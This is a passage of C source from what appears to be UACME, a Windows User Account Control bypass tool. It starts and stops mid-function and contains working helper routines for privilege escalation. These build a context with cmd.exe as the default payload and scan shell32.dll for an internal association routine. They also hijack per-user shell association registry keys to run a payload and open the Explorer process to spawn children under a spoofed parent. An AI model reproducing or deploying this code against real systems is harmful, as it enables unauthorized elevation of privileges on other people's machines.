_In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,\n    _In_ ULONG OptionalParameterLength,\n    _In_ PVOID DecompressRoutine\n)\n{\n    BOOLEAN IsWow64;\n    ULONG Seed, NtBuildNumber = 0;\n    PUACMECONTEXT Context;\n    HANDLE ContextHeap = NtCurrentPeb()->ProcessHeap;\n#ifdef _UCM_CONSOLE\n    HMODULE hNtdll;\n#endif\n    RTL_OSVERSIONINFOW osv;\n\n    UNREFERENCED_PARAMETER(Method);\n\n    if (OptionalParameterLength > MAX_PATH)\n        return NULL;\n\n    IsWow64 = supIsProcess32bit(NtCurrentProcess());\n\n    RtlSecureZeroMemory(&osv, sizeof(osv));\n    osv.dwOSVersionInfoSize = sizeof(osv);\n    RtlGetVersion((PRTL_OSVERSIONINFOW)&osv);\n    NtBuildNumber = osv.dwBuildNumber;\n\n    if (NtBuildNumber < NT_WIN7_RTM) {\n        return NULL;\n    }\n\n    Context = RtlAllocateHeap(ContextHeap, HEAP_ZERO_MEMORY, sizeof(UACMECONTEXT));\n    if (Context == NULL) {\n        return NULL;\n    }\n\n    //\n    // Create private heap, enable termination on corruption.\n    //\n    Context->ucmHeap = RtlCreateHeap(HEAP_GROWABLE, NULL, 0, 0, NULL, NULL);\n    if (Context->ucmHeap == NULL) {\n        RtlFreeHeap(ContextHeap, 0, Context);\n        return NULL;\n    }\n    RtlSetHeapInformation(Context->ucmHeap, HeapEnableTerminationOnCorruption, NULL, 0);\n\n    //\n    // Set Fubuki flag.\n    //\n    Context->AkagiFlag = AKAGI_FLAG_KILO;\n\n    //\n    // Remember NtBuildNumber.\n    //\n    Context->dwBuildNumber = NtBuildNumber;\n\n    //\n    // Set Cookie for supEncode/DecodePointer.\n    //\n    Seed = USER_SHARED_DATA->Cookie;\n    Context->Cookie = RtlRandomEx((PULONG)&Seed);\n\n    //\n    // Remember Wow64 process state.\n    //\n    Context->IsWow64 = IsWow64;\n\n    //\n    // Save OptionalParameter if present.\n    //\n    if (OptionalParameterLength) {\n        _strncpy(Context->szOptionalParameter, MAX_PATH,\n            OptionalParameter, OptionalParameterLength);\n        Context->OptionalParameterLength = OptionalParameterLength;\n 
   }\n\n    //\n    // Set IFileOperations flags.\n    //\n    if (NtBuildNumber > 14997) {\n        Context->IFileOperationFlags = FOF_NOCONFIRMATION |\n            FOFX_NOCOPYHOOKS |\n            FOFX_REQUIREELEVATION;\n    }\n    else {\n        Context->IFileOperationFlags = FOF_NOCONFIRMATION |\n            FOF_SILENT |\n            FOFX_SHOWELEVATIONPROMPT |\n            FOFX_NOCOPYHOOKS |\n            FOFX_REQUIREELEVATION;\n    }\n\n    //\n    // Query basic directories.\n    //       \n    // 1. SystemRoot\n    // 2. System32\n    if (!supQuerySystemRoot(Context)) {\n        RtlDestroyHeap(Context->ucmHeap);\n        RtlFreeHeap(ContextHeap, 0, Context);\n        return NULL;\n    }\n    // 3. Temp\n    supExpandEnvironmentStrings(L\"%temp%\\\\\", Context->szTempDirectory, MAX_PATH);\n\n    // 4. Current directory\n    if (GetCurrentDirectory(MAX_PATH, Context->szCurrentDirectory) < MAX_PATH) {\n        supPathAddBackSlash(Context->szCurrentDirectory);\n    }\n\n    //\n    // Default payload path.\n    //\n    _strcpy(Context->szDefaultPayload, Context->szSystemDirectory);\n    _strcat(Context->szDefaultPayload, CMD_EXE);\n\n    Context->DecompressRoutine = (pfnDecompressPayload)supDecodePointer(DecompressRoutine);\n\n#ifdef _UCM_CONSOLE\n    hNtdll = GetModuleHandle(L\"ntdll.dll\");\n    if (hNtdll) {\n        Context->swprintf_s = (pswprintf_s)GetProcAddress(hNtdll, \"swprintf_s\");\n    }\n#else\n    Context->swprintf_s = (PVOID)-1;\n#endif\n\n    return (PVOID)Context;\n}\n\n/*\n* supDestroyUacmeContext\n*\n* Purpose:\n*\n* Destroy program contexts.\n*\n*/\nVOID supDestroyUacmeContext(\n    _In_ PVOID Context\n)\n{\n    PUACMECONTEXT context = (PUACMECONTEXT)Context;\n\n    RtlDestroyHeap(context->ucmHeap);\n\n    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Context);\n}\n\n/*\n* supDecodeAndWriteBufferToFile\n*\n* Purpose:\n*\n* Create new file and write decoded buffer to it.\n*\n*/\nBOOL supDecodeAndWriteBufferToFile(\n    _In_ LPWSTR lpFileName,\n  
  _In_ CONST PVOID Buffer,\n    _In_ DWORD BufferSize,\n    _In_ ULONG Key\n)\n{\n    BOOL bResult;\n    PVOID p;\n    SIZE_T Size = ALIGN_UP_BY(BufferSize, PAGE_SIZE);\n\n    p = supVirtualAlloc(&Size, DEFAULT_ALLOCATION_TYPE | MEM_TOP_DOWN, DEFAULT_PROTECT_TYPE, NULL);\n    if (p) {\n        RtlCopyMemory(p, Buffer, BufferSize);\n\n        EncodeBuffer(p, BufferSize, Key);\n\n        bResult = supWriteBufferToFile(lpFileName, p, BufferSize);\n\n        supSecureVirtualFree(p, Size, NULL);\n\n        return bResult;\n    }\n    return FALSE;\n}\n\n/*\n* supEnableDisableWow64Redirection\n*\n* Purpose:\n*\n* Enable/Disable Wow64 redirection.\n*\n*/\nNTSTATUS supEnableDisableWow64Redirection(\n    _In_ BOOL bDisable\n)\n{\n    PVOID OldValue = NULL, Value;\n\n    if (bDisable)\n        Value = IntToPtr(TRUE);\n    else\n        Value = IntToPtr(FALSE);\n\n    return RtlWow64EnableFsRedirectionEx(Value, &OldValue);\n}\n\n/*\n* supGetProcessDebugObject\n*\n* Purpose:\n*\n* Reference process debug object.\n*\n*/\nNTSTATUS supGetProcessDebugObject(\n    _In_ HANDLE ProcessHandle,\n    _Out_ PHANDLE DebugObjectHandle)\n{\n    return NtQueryInformationProcess(\n        ProcessHandle,\n        ProcessDebugObjectHandle,\n        DebugObjectHandle,\n        sizeof(HANDLE),\n        NULL);\n}\n\n/*\n* supIsProcessRunning\n*\n* Purpose:\n*\n* Return TRUE if the given process is running in current session.\n*\n*/\nBOOL supIsProcessRunning(\n    _In_ LPWSTR ProcessName\n)\n{\n    BOOL bResult = FALSE;\n    ULONG nextEntryDelta = 0;\n    PVOID processList;\n\n    UNICODE_STRING lookupPsName;\n\n    union {\n        PSYSTEM_PROCESS_INFORMATION Processes;\n        PBYTE ListRef;\n    } List;\n\n    processList = supGetSystemInfo(SystemProcessInformation);\n    if (processList == NULL)\n        return bResult;\n\n    List.ListRef = (PBYTE)processList;\n\n    RtlInitUnicodeString(&lookupPsName, ProcessName);\n\n    do {\n\n        List.ListRef += nextEntryDelta;\n\n        if 
(List.Processes->SessionId == NtCurrentPeb()->SessionId) {\n\n            if (RtlEqualUnicodeString(&lookupPsName,\n                &List.Processes->ImageName,\n                TRUE))\n            {\n                bResult = TRUE;\n                break;\n            }\n\n        }\n\n        nextEntryDelta = List.Processes->NextEntryDelta;\n\n    } while (nextEntryDelta);\n\n    supHeapFree(processList);\n\n    return bResult;\n}\n\n/*\n* supBinTextEncode\n*\n* Purpose:\n*\n* Create pseudo random string from UI64 value.\n*\n*/\nVOID supBinTextEncode(\n    _In_ unsigned __int64 x,\n    _Inout_ wchar_t* s\n)\n{\n    char    tbl[64];\n    char    c = 0;\n    int     p;\n\n    tbl[62] = '-';\n    tbl[63] = '_';\n\n    for (c = 0; c < 26; ++c)\n    {\n        tbl[c] = 'A' + c;\n        tbl[26 + c] = 'a' + c;\n        if (c < 10)\n            tbl[52 + c] = '0' + c;\n    }\n\n    for (p = 0; p < 13; ++p)\n    {\n        c = x & 0x3f;\n        x >>= 5;\n        *s = (wchar_t)tbl[c];\n        ++s;\n    }\n\n    *s = 0;\n}\n\n/*\n* supGenerateSharedObjectName\n*\n* Purpose:\n*\n* Create pseudo random object name from its ID.\n*\n*/\nVOID supGenerateSharedObjectName(\n    _In_ WORD ObjectId,\n    _Inout_ LPWSTR lpBuffer\n)\n{\n    ULARGE_INTEGER value;\n\n    value.LowPart = MAKELONG(\n        MAKEWORD(UCM_VERSION_BUILD, UCM_VERSION_REVISION),\n        MAKEWORD(UCM_VERSION_MINOR, UCM_VERSION_MAJOR));\n\n    value.HighPart = MAKELONG(UACME_SHARED_BASE_ID, ObjectId);\n\n    supBinTextEncode(value.QuadPart, lpBuffer);\n}\n\n/*\n* supSetGlobalCompletionEvent\n*\n* Purpose:\n*\n* Set global completion event state to signaled.\n*\n*/\nVOID supSetGlobalCompletionEvent(\n    VOID)\n{\n    if (g_ctx->SharedContext.hCompletionEvent) {\n        SetEvent(g_ctx->SharedContext.hCompletionEvent);\n    }\n}\n\n/*\n* supWaitForGlobalCompletionEvent\n*\n* Purpose:\n*\n* Wait a little bit for things to complete.\n*\n*/\nNTSTATUS supWaitForGlobalCompletionEvent(\n    VOID)\n{\n    LARGE_INTEGER 
liDueTime;\n\n    if (g_ctx->SharedContext.hCompletionEvent) {\n#ifdef _DEBUG\n        liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(10000, 10000);\n#else\n        liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(50000, 10000);\n#endif\n        return NtWaitForSingleObject(g_ctx->SharedContext.hCompletionEvent, FALSE, &liDueTime);\n    }\n\n    return STATUS_WAIT_0;\n}\n\n/*\n* supOpenClassesKey\n*\n* Purpose:\n*\n* Open required subkey of current user.\n*\n*/\nNTSTATUS supOpenClassesKey(\n    _In_opt_ PUNICODE_STRING UserRegEntry,\n    _Out_ PHANDLE KeyHandle\n)\n{\n    UNICODE_STRING usRootKey, usKeyName;\n    HANDLE rootKeyHandle = NULL, keyHandle = NULL;\n    OBJECT_ATTRIBUTES obja;\n    NTSTATUS ntStatus;\n    ULONG dummy;\n\n    *KeyHandle = NULL;\n\n    if (UserRegEntry == NULL) {\n\n        ntStatus = RtlFormatCurrentUserKeyPath(&usRootKey);\n        if (!NT_SUCCESS(ntStatus))\n            return ntStatus;\n    }\n    else {\n        RtlCopyMemory(&usRootKey, UserRegEntry, sizeof(UNICODE_STRING));\n    }\n\n    InitializeObjectAttributes(&obja, &usRootKey, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n    ntStatus = NtOpenKey(&rootKeyHandle, MAXIMUM_ALLOWED, &obja);\n    if (!NT_SUCCESS(ntStatus)) {\n        //\n        // Free the key path only when it was allocated here.\n        //\n        if (UserRegEntry == NULL)\n            RtlFreeUnicodeString(&usRootKey);\n        return ntStatus;\n    }\n\n    RtlInitUnicodeString(&usKeyName, T_SOFTWARE_CLASSES);\n    obja.ObjectName = &usKeyName;\n    obja.RootDirectory = rootKeyHandle;\n\n    ntStatus = NtCreateKey(&keyHandle,\n        MAXIMUM_ALLOWED,\n        &obja,\n        0,\n        NULL,\n        REG_OPTION_NON_VOLATILE,\n        &dummy);\n\n    if (NT_SUCCESS(ntStatus))\n        *KeyHandle = keyHandle;\n\n    NtClose(rootKeyHandle);\n\n    if (UserRegEntry == NULL)\n        RtlFreeUnicodeString(&usRootKey);\n\n    return ntStatus;\n}\n\n\n/*\n* supRemoveRegLinkHKCU\n*\n* Purpose:\n*\n* Remove registry symlink for current user.\n*\n*/\nNTSTATUS supRemoveRegLinkHKCU(\n    _In_ LPWSTR lpszRegLink\n)\n{\n    NTSTATUS status = 
STATUS_UNSUCCESSFUL;\n\n    ULONG cbKureND;\n\n    UNICODE_STRING usCurrentUser, usLinkPath;\n    OBJECT_ATTRIBUTES obja;\n    UNICODE_STRING CmSymbolicLinkValue = RTL_CONSTANT_STRING(L\"SymbolicLinkValue\");\n\n    PWSTR lpLinkKeyBuffer = NULL;\n    SIZE_T memIO;\n\n    HANDLE hKey = NULL;\n\n    cbKureND = (ULONG)(_strlen(lpszRegLink)) * sizeof(WCHAR);\n\n    InitializeObjectAttributes(&obja, &usLinkPath, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n    status = RtlFormatCurrentUserKeyPath(&usCurrentUser);\n    if (!NT_SUCCESS(status))\n        return status;\n\n    do {\n\n        memIO = sizeof(UNICODE_NULL) + usCurrentUser.MaximumLength + cbKureND;\n        lpLinkKeyBuffer = (PWSTR)supHeapAlloc(memIO);\n        if (lpLinkKeyBuffer == NULL)\n            break;\n\n        usLinkPath.Buffer = lpLinkKeyBuffer;\n        usLinkPath.Length = 0;\n        usLinkPath.MaximumLength = (USHORT)memIO;\n\n        status = RtlAppendUnicodeStringToString(&usLinkPath, &usCurrentUser);\n        if (!NT_SUCCESS(status))\n            break;\n\n        status = RtlAppendUnicodeToString(&usLinkPath, lpszRegLink);\n        if (!NT_SUCCESS(status))\n            break;\n\n        InitializeObjectAttributes(&obja, &usLinkPath, OBJ_CASE_INSENSITIVE | OBJ_OPENLINK, NULL, NULL);\n\n        status = NtOpenKey(&hKey,\n            KEY_ALL_ACCESS,\n            &obja);\n\n        if (NT_SUCCESS(status)) {\n            status = NtDeleteValueKey(hKey, &CmSymbolicLinkValue);\n            if (NT_SUCCESS(status))\n                status = NtDeleteKey(hKey);\n            NtClose(hKey);\n        }\n\n    } while (FALSE);\n\n    if (lpLinkKeyBuffer) supHeapFree(lpLinkKeyBuffer);\n    RtlFreeUnicodeString(&usCurrentUser);\n\n    return status;\n}\n\n/*\n* supFindPattern\n*\n* Purpose:\n*\n* Lookup pattern in buffer.\n*\n*/\nPVOID supFindPattern(\n    _In_ CONST PBYTE Buffer,\n    _In_ SIZE_T BufferSize,\n    _In_ CONST PBYTE Pattern,\n    _In_ SIZE_T PatternSize\n)\n{\n    PBYTE p0 = Buffer, pnext;\n\n    if 
(PatternSize == 0)\n        return NULL;\n\n    if (BufferSize < PatternSize)\n        return NULL;\n\n    do {\n        pnext = (PBYTE)memchr(p0, Pattern[0], BufferSize);\n        if (pnext == NULL)\n            break;\n\n        BufferSize -= (ULONG_PTR)(pnext - p0);\n\n        if (BufferSize < PatternSize)\n            return NULL;\n\n        if (memcmp(pnext, Pattern, PatternSize) == 0)\n            return pnext;\n\n        p0 = pnext + 1;\n        --BufferSize;\n    } while (BufferSize > 0);\n\n    return NULL;\n}\n\n/*\n* supLookupImageSectionByName\n*\n* Purpose:\n*\n* Lookup section pointer and size for section name.\n*\n*/\nPVOID supLookupImageSectionByName(\n    _In_ CHAR* SectionName,\n    _In_ ULONG SectionNameLength,\n    _In_ PVOID DllBase,\n    _Out_ PULONG SectionSize\n)\n{\n    BOOLEAN bFound = FALSE;\n    ULONG i;\n    PVOID Section;\n    IMAGE_NT_HEADERS* NtHeaders = RtlImageNtHeader(DllBase);\n    IMAGE_SECTION_HEADER* SectionTableEntry;\n\n    //\n    // Assume failure.\n    //\n    if (SectionSize)\n        *SectionSize = 0;\n\n    if (NtHeaders == NULL)\n        return NULL;\n\n    SectionTableEntry = (PIMAGE_SECTION_HEADER)((PCHAR)NtHeaders +\n        sizeof(ULONG) +\n        sizeof(IMAGE_FILE_HEADER) +\n        NtHeaders->FileHeader.SizeOfOptionalHeader);\n\n    //\n    // Locate section.\n    //\n    i = NtHeaders->FileHeader.NumberOfSections;\n    while (i > 0) {\n\n        if (_strncmp_a(\n            (CHAR*)SectionTableEntry->Name,\n            SectionName,\n            SectionNameLength) == 0)\n        {\n            bFound = TRUE;\n            break;\n        }\n\n        i -= 1;\n        SectionTableEntry += 1;\n    }\n\n    //\n    // Section not found, abort scan.\n    //\n    if (!bFound)\n        return NULL;\n\n    Section = (PVOID)((ULONG_PTR)DllBase + SectionTableEntry->VirtualAddress);\n    if (SectionSize)\n        *SectionSize = SectionTableEntry->Misc.VirtualSize;\n\n    return Section;\n}\n\n/*\n* 
supGetUserAssocSetDB\n*\n* Purpose:\n*\n* Return pointer to UAS table and optionally count of entries.\n*\n*/\nPUSER_ASSOC_SIGNATURE supGetUserAssocSetDB(\n    _Out_opt_ PULONG SignatureCount\n)\n{\n    if (SignatureCount)\n        *SignatureCount = RTL_NUMBER_OF(g_UserAssocSignatures);\n\n    return (PUSER_ASSOC_SIGNATURE)&g_UserAssocSignatures;\n}\n\n/*\n* supEnumUserAssocSetDB\n*\n* Purpose:\n*\n* Enumerate UserSetAssocDB.\n*\n*/\nVOID supEnumUserAssocSetDB(\n    _In_ PSUP_UAS_ENUMERATION_CALLBACK_FUNCTION Callback,\n    _In_opt_ PVOID Context\n)\n{\n    USER_ASSOC_SIGNATURE* pSignature;\n    ULONG i, signCount;\n\n    BOOLEAN bStopEnumeration;\n\n    bStopEnumeration = FALSE;\n    signCount = RTL_NUMBER_OF(g_UserAssocSignatures);\n\n    //\n    // Iterate through signatures table.\n    //\n    for (i = 0; i < signCount; i++) {\n\n        pSignature = g_UserAssocSignatures[i];\n\n        Callback(pSignature, Context, &bStopEnumeration);\n\n        if (bStopEnumeration)\n            break;\n    }\n}\n\n/*\n* supFindUserAssocSet\n*\n* Purpose:\n*\n* Locate internal shell routine.\n*\n*/\nNTSTATUS supFindUserAssocSet(\n    _Out_ USER_ASSOC_PTR* Function\n)\n{\n    HANDLE  hModule;\n\n    PBYTE  ptrCode;\n    PVOID  sectionBase, patternPtr, funcPtr;\n    ULONG  i, j, signCount;\n    ULONG  sectionSize = 0, patternSize = 0;\n    LONG   rel = 0;\n    hde64s hs;\n    WCHAR  szBuffer[MAX_PATH * 2];\n\n    USER_ASSOC_SIGNATURE* pSignature;\n    USER_ASSOC_PATTERN* pPattern;\n    PVOID* pTable;\n\n    Function->UserAssocSet = NULL;\n    Function->Valid = FALSE;\n\n    //\n    // Preload shell32.dll\n    //\n    hModule = (HMODULE)GetModuleHandle(SHELL32_DLL);\n    if (hModule == NULL) {\n        _strcpy(szBuffer, g_ctx->szSystemDirectory);\n        _strcat(szBuffer, SHELL32_DLL);\n        hModule = (HANDLE)LoadLibraryEx(szBuffer, NULL, 0);\n    }\n    if (hModule == NULL)\n        return STATUS_DLL_NOT_FOUND;\n\n    //\n    // Find text section and remember its 
boundaries.\n    //\n    sectionBase = supLookupImageSectionByName(TEXT_SECTION,\n        TEXT_SECTION_LEGNTH,\n        (PVOID)hModule,\n        &sectionSize);\n\n    if (sectionBase == NULL || sectionSize == 0)\n        return STATUS_INVALID_ADDRESS;\n\n\n    ptrCode = NULL;\n    signCount = RTL_NUMBER_OF(g_UserAssocSignatures);\n\n    //\n    // Iterate through signatures table and try each one for corresponding nt build.\n    //\n    for (i = 0; i < signCount; i++) {\n\n        pSignature = g_UserAssocSignatures[i];\n\n        //\n        // If the Windows version matches, use these signatures.\n        //\n        if (g_ctx->dwBuildNumber >= pSignature->NtBuildMin &&\n            g_ctx->dwBuildNumber <= pSignature->NtBuildMax)\n        {\n\n            pTable = pSignature->PatternsTable;\n\n            //\n            // Try all available patterns.\n            //\n            for (j = 0; j < pSignature->PatternsCount; j++) {\n\n                pPattern = pTable[j];\n\n                patternPtr = pPattern->Ptr;\n                patternSize = pPattern->Size;\n\n                //\n                // Lookup signature.\n                //\n                ptrCode = (PBYTE)supFindPattern(sectionBase,\n                    sectionSize,\n                    patternPtr,\n                    patternSize);\n\n                if (ptrCode) {\n\n                    //\n                    // Pointer within section.\n                    //\n                    if (IN_REGION(ptrCode, sectionBase, sectionSize)) {\n                        break;\n                    }\n                    else {\n                        ptrCode = NULL;\n                    }\n                }\n\n            }\n\n            if (ptrCode)\n                break;\n        }\n\n    }\n\n    if (ptrCode == NULL || patternSize == 0)\n        return STATUS_NOT_FOUND;\n\n    //\n    // Skip signature bytes.\n    //\n    ptrCode = (PBYTE)RtlOffsetToPointer(ptrCode, patternSize);\n\n    //\n    // Disassemble 
instruction and check it to be call sus.\n    //\n    hde64_disasm(ptrCode, &hs);\n    if (hs.flags & F_ERROR)\n        return STATUS_INTERNAL_ERROR;\n\n    if ((hs.len != 5) || (ptrCode[0] != 0xE8)) //call sus\n        return STATUS_BAD_DATA;\n\n    rel = *(PLONG)(ptrCode + 1);\n\n    funcPtr = ptrCode + hs.len + rel;\n\n    if (IN_REGION(funcPtr, sectionBase, sectionSize)) {\n        Function->UserAssocSet = (pfnUserAssocSet)funcPtr;\n        Function->Valid = TRUE;\n        return STATUS_SUCCESS;\n    }\n    else {\n        return STATUS_CONFLICTING_ADDRESSES;\n    }\n\n}\n\n/*\n* supRegisterShellAssoc\n*\n* Purpose:\n*\n* Set and register shell protocol.\n*\n*/\nNTSTATUS supRegisterShellAssoc(\n    _In_ LPCWSTR pszExt,\n    _In_ LPCWSTR pszProgId,\n    _In_ USER_ASSOC_PTR* UserAssocFunc,\n    _In_ LPCWSTR lpszPayload,\n    _In_ BOOL fCustomURIScheme,\n    _In_opt_ LPCWSTR pszDefaultValue\n)\n{\n    HANDLE classesKey = NULL, protoKey = NULL, assocKey = NULL;\n    NTSTATUS ntStatus;\n    SIZE_T sz;\n\n    HRESULT hr = E_FAIL;\n\n    WCHAR szBuffer[MAX_PATH];\n\n    if (UserAssocFunc == NULL)\n        return STATUS_INVALID_PARAMETER_3;\n\n    if (UserAssocFunc->Valid == FALSE)\n        return STATUS_INVALID_PARAMETER_3;\n\n    if (lpszPayload == NULL)\n        return STATUS_INVALID_PARAMETER_4;\n\n    ntStatus = supOpenClassesKey(NULL, &classesKey);\n    if (!NT_SUCCESS(ntStatus))\n        return ntStatus;\n\n    //\n    // Write custom pluggable protocol handler mark.\n    //\n\n    if (fCustomURIScheme) {\n\n        if (ERROR_SUCCESS == RegCreateKeyEx(classesKey,\n            pszExt,\n            0,\n            NULL,\n            REG_OPTION_NON_VOLATILE,\n            KEY_SET_VALUE,\n            NULL,\n            (HKEY*)&protoKey,\n            NULL))\n        {\n            RegSetValueEx(protoKey, T_URL_PROTOCOL, 0, REG_SZ, NULL, 0);\n\n            if (pszDefaultValue) {\n                sz = (_strlen(pszDefaultValue) + 1) * sizeof(WCHAR);\n                
RegSetValueEx(protoKey, TEXT(\"\"), 0, REG_SZ, (BYTE*)pszDefaultValue, (DWORD)sz);\n            }\n\n            RegCloseKey(protoKey);\n        }\n    }\n\n    //\n    // Create protocol registry entry.\n    //\n    _strcpy(szBuffer, pszProgId);\n    _strcat(szBuffer, T_SHELL_OPEN);\n    _strcat(szBuffer, TEXT(\"\\\\\"));\n    _strcat(szBuffer, T_SHELL_COMMAND);\n\n    if (ERROR_SUCCESS == RegCreateKeyEx(classesKey,\n        szBuffer,\n        0,\n        NULL,\n        REG_OPTION_NON_VOLATILE,\n        MAXIMUM_ALLOWED,\n        NULL,\n        (HKEY*)&assocKey,\n        NULL))\n    {\n\n        sz = (_strlen(lpszPayload) + 1) * sizeof(WCHAR);\n\n        if (ERROR_SUCCESS == RegSetValueEx(assocKey,\n            TEXT(\"\"),\n            0,\n            REG_SZ,\n            (BYTE*)lpszPayload,\n            (DWORD)sz))\n        {\n            ntStatus = STATUS_SUCCESS;\n        }\n        else {\n            ntStatus = STATUS_REGISTRY_IO_FAILED;\n        }\n\n        RegCloseKey(assocKey);\n    }\n    else {\n        ntStatus = STATUS_REGISTRY_IO_FAILED;\n    }\n\n    NtClose(classesKey);\n\n    if (!NT_SUCCESS(ntStatus))\n        return ntStatus;\n\n    ntStatus = STATUS_UNSUCCESSFUL;\n\n    //\n    // Register protocol within the shell.\n    //\n    if (g_ctx->dwBuildNumber > NT_WIN10_20H2) {\n\n        hr = UserAssocFunc->UserAssocSet2(UASET_PROGID,\n            pszExt,\n            pszProgId,\n            2);\n\n    }\n    else {\n\n        switch (g_ctx->dwBuildNumber) {\n        case NT_WIN10_19H1:\n        case NT_WIN10_19H2:\n        case NT_WIN10_REDSTONE5:\n\n            hr = UserAssocFunc->UserAssocSet2(UASET_PROGID,\n                pszExt,\n                pszProgId,\n                2);\n\n            break;\n\n        default:\n\n            hr = UserAssocFunc->UserAssocSet(UASET_PROGID,\n                pszExt,\n                pszProgId);\n\n            break;\n        }\n\n    }\n\n    if (SUCCEEDED(hr)) {\n        ntStatus = STATUS_SUCCESS;\n    }\n 
   else if (hr == E_ACCESSDENIED) {\n        ntStatus = STATUS_ACCESS_DENIED;\n    }\n\n    return ntStatus;\n}\n\n/*\n* supUnregisterShellAssocEx\n*\n* Purpose:\n*\n* Unregister and optionally remove shell protocol.\n*\n*/\nNTSTATUS supUnregisterShellAssocEx(\n    _In_ BOOLEAN fResetOnly,\n    _In_ LPCWSTR pszExt,\n    _In_opt_ LPCWSTR pszProgId,\n    _In_ USER_ASSOC_PTR* UserAssocFunc\n)\n{\n    NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;\n    HANDLE classesKey = NULL;\n    HRESULT hr;\n\n    if (UserAssocFunc == NULL)\n        return STATUS_INVALID_PARAMETER_3;\n\n    if (UserAssocFunc->Valid == FALSE)\n        return STATUS_INVALID_PARAMETER_3;\n\n    if (fResetOnly == FALSE) {\n        ntStatus = supOpenClassesKey(NULL, &classesKey);\n        if (!NT_SUCCESS(ntStatus))\n            return ntStatus;\n    }\n\n    switch (g_ctx->dwBuildNumber) {\n    case NT_WIN10_19H1:\n    case NT_WIN10_19H2:\n\n        hr = UserAssocFunc->UserAssocSet2(UASET_CLEAR,\n            pszExt,\n            NULL,\n            0);\n\n        break;\n    default:\n\n        hr = UserAssocFunc->UserAssocSet(UASET_CLEAR,\n            pszExt,\n            NULL);\n\n        break;\n    }\n\n    if (SUCCEEDED(hr))\n        ntStatus = STATUS_SUCCESS;\n\n    if (fResetOnly == FALSE) {\n        if (pszProgId)\n            supRegDeleteKeyRecursive(classesKey, pszProgId);\n        supRegDeleteKeyRecursive(classesKey, pszExt);\n        NtClose(classesKey);\n    }\n\n    return ntStatus;\n}\n\n/*\n* supUnregisterShellAssoc\n*\n* Purpose:\n*\n* Unregister and remove shell protocol.\n*\n*/\nNTSTATUS supUnregisterShellAssoc(\n    _In_ LPCWSTR pszExt,\n    _In_ LPCWSTR pszProgId,\n    _In_ USER_ASSOC_PTR* UserAssocFunc\n)\n{\n    return supUnregisterShellAssocEx(FALSE,\n        pszExt,\n        pszProgId,\n        UserAssocFunc);\n}\n\n/*\n* supResetShellAssoc\n*\n* Purpose:\n*\n* Reset shell protocol association without removing its registry keys.\n*\n*/\nNTSTATUS supResetShellAssoc(\n    _In_ LPCWSTR pszExt,\n    _In_opt_ LPCWSTR 
pszProgId,\n    _In_ USER_ASSOC_PTR* UserAssocFunc\n)\n{\n    return supUnregisterShellAssocEx(TRUE,\n        pszExt,\n        pszProgId,\n        UserAssocFunc);\n\n}\n\n/*\n* supStopTaskByName\n*\n* Purpose:\n*\n* Stop scheduled task by name.\n*\n*/\nBOOL supStopTaskByName(\n    _In_ LPCWSTR TaskFolder,\n    _In_ LPCWSTR TaskName\n)\n{\n    BOOL bResult = FALSE;\n    HRESULT hr;\n    ITaskService* pService = NULL;\n    ITaskFolder* pRootFolder = NULL;\n    IRegisteredTask* pTask = NULL;\n    TASK_STATE taskState;\n\n    BSTR bstrTaskFolder = NULL;\n    BSTR bstrTask = NULL;\n    VARIANT varDummy;\n\n    do {\n\n        bstrTaskFolder = SysAllocString(TaskFolder);\n        if (bstrTaskFolder == NULL)\n            break;\n\n        bstrTask = SysAllocString(TaskName);\n        if (bstrTask == NULL)\n            break;\n\n        hr = CoCreateInstance(&CLSID_TaskScheduler,\n            NULL,\n            CLSCTX_INPROC_SERVER,\n            &IID_ITaskService,\n            (void**)&pService);\n\n        if (FAILED(hr))\n            break;\n\n        VariantInit(&varDummy);\n\n        hr = pService->lpVtbl->Connect(pService,\n            varDummy,\n            varDummy,\n            varDummy,\n            varDummy);\n\n        if (FAILED(hr))\n            break;\n\n        hr = pService->lpVtbl->GetFolder(pService, bstrTaskFolder, &pRootFolder);\n        if (FAILED(hr))\n            break;\n\n        hr = pRootFolder->lpVtbl->GetTask(pRootFolder, bstrTask, &pTask);\n        if (FAILED(hr))\n            break;\n\n        hr = pTask->lpVtbl->get_State(pTask, &taskState);\n        if (FAILED(hr))\n            break;\n\n        if (taskState == TASK_STATE_RUNNING) {\n            hr = pTask->lpVtbl->Stop(pTask, 0);\n        }\n\n        bResult = SUCCEEDED(hr);\n\n    } while (FALSE);\n\n    if (bstrTaskFolder)\n        SysFreeString(bstrTaskFolder);\n\n    if (bstrTask)\n        SysFreeString(bstrTask);\n\n    if (pTask)\n        pTask->lpVtbl->Release(pTask);\n\n    if 
(pRootFolder)\n        pRootFolder->lpVtbl->Release(pRootFolder);\n\n    if (pService)\n        pService->lpVtbl->Release(pService);\n\n    return bResult;\n}\n\n/*\n* supPathAddBackSlash\n*\n* Purpose:\n*\n* Add trailing backslash to the path if it doesn't have one.\n*\n*/\nLPWSTR supPathAddBackSlash(\n    _In_ LPWSTR lpszPath\n)\n{\n    SIZE_T nLength;\n    LPWSTR lpszEnd, lpszPrev, lpszResult = NULL;\n\n    nLength = _strlen(lpszPath);\n\n    if (nLength) {\n\n        lpszEnd = lpszPath + nLength;\n\n        if (lpszPath == lpszEnd)\n            lpszPrev = lpszPath;\n        else\n            lpszPrev = (LPWSTR)lpszEnd - 1;\n\n        if (*lpszPrev != TEXT('\\\\')) {\n            *lpszEnd++ = TEXT('\\\\');\n            *lpszEnd = TEXT('\\0');\n        }\n\n        lpszResult = lpszEnd;\n\n    }\n\n    return lpszResult;\n}\n\n/*\n* supOpenShellProcess\n*\n* Purpose:\n*\n* Return handle to shell process.\n*\n*/\nHANDLE supOpenShellProcess(\n    _In_ ULONG dwDesiredAccess\n)\n{\n    HWND hwndShell = GetShellWindow();\n    ULONG processId = 0, desiredAccess = dwDesiredAccess;\n\n    GetWindowThreadProcessId(hwndShell, &processId);\n    if (processId) {\n\n        if (!(desiredAccess & PROCESS_CREATE_PROCESS))\n            desiredAccess |= PROCESS_CREATE_PROCESS;\n\n        return OpenProcess(desiredAccess, FALSE, processId);\n\n    }\n\n    return NULL;\n}\n\n/*\n* supRunProcessFromParent\n*\n* Purpose:\n*\n* Start new process with given parent.\n*\n*/\nHANDLE supRunProcessFromParent(\n    _In_ HANDLE hParentProcess,\n    _Inout_opt_ 